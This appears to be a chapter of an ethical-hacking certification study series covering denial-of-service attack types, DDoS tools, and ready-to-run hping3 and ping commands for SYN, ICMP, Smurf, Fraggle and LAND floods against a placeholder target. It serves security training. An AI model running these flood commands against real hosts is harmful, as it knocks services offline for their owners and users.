[ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Denial of Service

This entry is part 19 of 30 in the series [ Certified Ethical Hacker Training ]

Chapter 10 Continued: Denial of Service

What It Looks Like

Digital Attack Map:

The VLS DDoS Attack, visualized with ApachePong / Logstalgia:

Low Orbit Ion Cannon: a classic DDoS tool:

Low Orbit Ion Cannon
Low Orbit Ion Cannon


DoS Attack Types

  1. Fragmentation
  2. Volumetric
  3. Application
  4. TCP state-exhaustion

Example DoS Attacks

  • SYN attack
  • SYN flood
  • ICMP flood
  • Smurfing
  • Ping of Death
  • Teardrop
  • LAND attack
  • Peer to Peer
  • Permanent

DDoS Tools

  • Trinity
  • Tribe Flood Network
  • RUDY
  • Slowloris

Types of Attacks

Service request flood

Simply make millions of page requests, for instance. See the effects:

SYN attack/flood:

hping3 -i u1 -S -p 80 <target ip>

S = SYN flag, -p 80 = port 80, -i u1 = interval, 1 microsecond

ICMP floods

These include Smurfing, ICMP flooding and ping flooding.

A simple ICMP flood:

hping3 -1 --flood -a <target ip> <broadcast ip>

Ping of Death (note that this no longer works)

From a Windows machine:

ping -l 65500 <target ip> -w 1 -n 1

Teardrop attack

This involves fragmenting a packet but mis-matching the numbers where the segments should meet (the fragment offset).

Amplification attacks, which include:

Smurf attack

hping3 --icmp --spoof <target ip> <broadcast ip>

Fraggle attack

hping3 --udp --spoof <target ip> <broadcast ip>

LAND attack (Local Area Network Denial)
(no modern network is susceptible to this attack)

hping3 -V -c 1000000 -d 120 -S -w 64 -p 445 -s 445 --flood --rand-source <target ip>


Permanent DoS attacks

Phlashing is flashing malicious code to BIOS or any other firmware location. For most people, this is irrecoverable.

Application-level attacks

Flooding the network

Disrupting services, for instance the login service by making lots of failed attempts so that users get locked out

Jamming the network, usually by crafting SQL that locks or corrupts a database


Series Navigation<< [ Certified Ethical Hacker v10 ] :: [ Chapter 10 ] :: Trojans, Backdoors, Viruses and Worms[ Certified Ethical Hacker v10 ] :: [ Chapter 10 cont’d] :: Buffer Overflow >>